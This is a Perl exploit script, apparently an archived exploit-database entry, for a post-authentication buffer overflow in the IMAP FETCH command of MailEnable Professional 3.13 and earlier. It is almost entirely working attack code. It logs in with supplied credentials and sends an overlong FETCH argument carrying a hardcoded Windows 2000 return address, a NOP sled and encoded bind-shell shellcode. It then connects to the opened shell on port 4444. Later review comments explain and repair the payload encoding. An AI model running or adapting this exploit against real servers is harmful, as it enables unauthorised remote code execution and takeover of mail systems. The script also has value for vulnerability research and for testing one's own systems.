
# Title : MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit
# Published : 2008-03-14
# Author : haluznik


#!/usr/bin/perl

# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
#
# Bind Shell POC Exploit for Win2K SP4 pro English
#
# Found by   : Luigi Auriemma
# Advisory   : http://aluigi.altervista.org/adv/maildisable-adv.txt
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 10.3.2008 ..enjoy!:]
# =================================================================


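use strict;
use warnings;
use IO::Socket;

# NOTE(review): the archived listing had lost every backslash in its string
# escapes ("n" for "\n", "rn" for "\r\n", "x2b" for "\x2b").  They are
# restored below so the script emits CRLF-terminated IMAP commands and raw
# shellcode bytes instead of literal letters.

print "\n [*] MailEnable Professional 3.13 imap remote exploit";
print "\n [*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n";

# Three positional arguments: target host plus a valid mailbox login.  The
# overflow is post-authentication, so working credentials are mandatory.
if (@ARGV < 3) {
    print " [!] Use: perl imap.pl [Host] [User] [Pass]\n";
    exit;
}

my ($host, $user, $pass) = @ARGV;
my $port = 143;    # IMAP

# Metasploit win32 bind shell listening on TCP/4444, wrapped in an XOR
# decoder stub.  The encoder was told to avoid 0x00 0x0A 0x0D 0x20 0x29
# (NUL, LF, CR, space, ')') -- presumably because the IMAP command parser
# treats them as delimiters; confirm against the advisory if changing payload.
my $shellcode =
    "\x2b\xc9\x66\x81\xe9\xb0\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
    "\x0e\xe6\x02\xe4\x6f\x83\xee\xfc\xe2\xf4\x1a\x68\x0f\x22\x0e\xfb" .
    "\x1b\x90\x19\x62\x6f\x03\xc2\x26\x6f\x2a\xda\x89\x98\x6a\x9e\x03" .
    "\x0b\xe4\xa9\x1a\x6f\x30\xc6\x03\x0f\x26\x6d\x36\x6f\x6e\x08\x33" .
    "\x24\xf6\x4a\x86\x24\x1b\xe1\xc3\x2e\x62\xe7\xc0\x0f\x9b\xdd\x56" .
    "\xc0\x47\x93\xe7\x6f\x30\xc2\x03\x0f\x09\x6d\x0e\xaf\xe4\xb9\x1e" .
    "\xe5\x84\xe5\x2e\x6f\xe6\x8a\x26\xf8\x0e\x25\x33\x3f\x0b\x6d\x41" .
    "\xd4\xe4\xa6\x0e\x6f\x1f\xfa\xaf\x6f\x2f\xee\x5c\x8c\xe1\xa8\x0c" .
    "\x08\x3f\x19\xd4\x82\x3c\x80\x6a\xd7\x5d\x8e\x75\x97\x5d\xb9\x56" .
    "\x1b\xbf\x8e\xc9\x09\x93\xdd\x52\x1b\xb9\xb9\x8b\x01\x09\x67\xef" .
    "\xec\x6d\xb3\x68\xe6\x90\x36\x6a\x3d\x66\x13\xaf\xb3\x90\x30\x51" .
    "\xb7\x3c\xb5\x51\xa7\x3c\xa5\x51\x1b\xbf\x80\x6a\xf5\x33\x80\x51" .
    "\x6d\x8e\x73\x6a\x40\x75\x96\xc5\xb3\x90\x30\x68\xf4\x3e\xb3\xfd" .
    "\x34\x07\x42\xaf\xca\x86\xb1\xfd\x32\x3c\xb3\xfd\x34\x07\x03\x4b" .
    "\x62\x26\xb1\xfd\x32\x3f\xb2\x56\xb1\x90\x36\x91\x8c\x88\x9f\xc4" .
    "\x9d\x38\x19\xd4\xb1\x90\x36\x64\x8e\x0b\x80\x6a\x87\x02\x6f\xe7" .
    "\x8e\x3f\xbf\x2b\x28\xe6\x01\x68\xa0\xe6\x04\x33\x24\x9c\x4c\xfc" .
    "\xa6\x42\x18\x40\xc8\xfc\x6b\x78\xdc\xc4\x4d\xa9\x8c\x1d\x18\xb1" .
    "\xf2\x90\x93\x46\x1b\xb9\xbd\x55\xb6\x3e\xb7\x53\x8e\x6e\xb7\x53" .
    "\xb1\x3e\x19\xd2\x8c\xc2\x3f\x07\x2a\x3c\x19\xd4\x8e\x90\x19\x35" .
    "\x1b\xbf\x6d\x55\x18\xec\x22\x66\x1b\xb9\xb4\xfd\x34\x07\x16\x88" .
    "\xe0\x30\xb5\xfd\x32\x90\x36\x02\xe4\x6f";

# Overflow layout: 997 bytes of filler up to the 4-byte address the crash
# hands control to, then a short NOP sled into the decoder stub.  0x7c4fedbb
# (written little-endian) is specific to Win2K SP4 Professional English, as
# the header says; any other Windows build needs its own address.
my $ret  = "\xbb\xed\x4f\x7c";
my $buff = ("A" x 997) . $ret . ("\x90" x 20) . $shellcode;

# The original passed proto=>'tcp' in lowercase, which IO::Socket::INET does
# not recognise (it silently fell back to the TCP default).  $@ carries the
# connect error.
my $socket = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
) or die " [-] cannot connect to host! ($@)\n";

# Read one chunk (up to 1 KiB) of server output and echo it.  recv()
# returns undef on error; there is no point continuing the dialogue then.
sub read_reply {
    my ($sock) = @_;
    my $reply;
    defined recv($sock, $reply, 1024, 0) or die " [-] recv failed: $!\n";
    print " [i] " . $reply;
    return $reply;
}

# Send one IMAP command line, CRLF-terminated as RFC 3501 requires.
sub send_line {
    my ($sock, $cmd) = @_;
    defined send($sock, $cmd . "\r\n", 0) or die " [-] send failed: $!\n";
    return;
}

read_reply($socket);    # server greeting
print " [+] logging..\n";

# Credentials are sent as bare atoms, exactly as in the original; a user or
# password containing spaces or quotes would need IMAP quoting to log in.
send_line($socket, "a001 LOGIN " . $user . " " . $pass);
read_reply($socket);

# The SELECT reply is deliberately not read (matches the original); the
# untagged responses simply stay in the socket buffer.
send_line($socket, "a002 SELECT INBOX");

print " [+] sending evil payload..\n";

# The over-long message-data-item argument to FETCH is what overflows.
send_line($socket, "a003 FETCH 1:4 " . $buff);

print " [*] exploiting done!\n";
print " [*] connecting to port 4444 of $host\n";
sleep(6);    # give the bind shell time to start listening

# List-form system() passes $host as an argv element instead of through a
# shell.  The original interpolated it into a command string, so a host
# argument containing shell metacharacters would have executed locally.
system('telnet', $host, '4444') == -1
    and warn " [-] could not run telnet: $!\n";

close $socket;
exit;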
